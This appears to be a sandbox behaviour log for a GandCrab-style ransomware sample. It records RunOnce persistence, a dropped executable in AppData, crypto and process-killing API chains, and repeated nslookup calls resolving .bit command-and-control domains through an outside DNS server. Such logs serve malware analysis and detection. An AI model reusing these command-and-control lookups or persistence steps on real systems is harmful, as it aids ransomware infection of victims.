                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeJump to behavior
                    Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@127/2@529/0
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00406D90 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,1_2_00406D90
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00404640 CreateToolhelp32Snapshot,VirtualAlloc,Process32FirstW,CloseHandle,lstrcmpiW,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Process32NextW,VirtualFree,FindCloseChangeNotification,1_2_00404640
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4272:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5500:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1328:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3880:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1944:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_01
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeMutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=66326910ce147b1b
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_01
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: 9gkAKTWOXp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00407C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,1_2_00407C60
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeJump to dropped file
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlalJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlalJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlalJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlalJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exe TID: 4584Thread sleep count: 80 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exe TID: 4584Thread sleep time: -800000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeEvaded block: after key decisiongraph_13-1886
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeEvaded block: after key decisiongraph_21-1926
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,1_2_00402F50
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,13_2_00402F50
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,21_2_00402F50
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,1_2_004066F0
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,1_2_004064A0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,13_2_004066F0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,13_2_004064A0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,21_2_004066F0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,21_2_004064A0
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeAPI call chain: ExitProcess graph end nodegraph_1-1626
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeAPI call chain: ExitProcess graph end nodegraph_1-2087
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeAPI call chain: ExitProcess graph end nodegraph_1-1633
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeAPI call chain: ExitProcess graph end nodegraph_1-1615
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeAPI call chain: ExitProcess graph end nodegraph_13-1586
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeAPI call chain: ExitProcess graph end nodegraph_13-1593
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeAPI call chain: ExitProcess graph end nodegraph_13-1613
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeAPI call chain: ExitProcess graph end nodegraph_13-1744
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00407C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,1_2_00407C60
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_00405050 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,MultiByteToWideChar,GetLastError,VirtualAlloc,VirtualFree,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,1_2_00405050
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeProcess created: unknown unknownJump to behavior
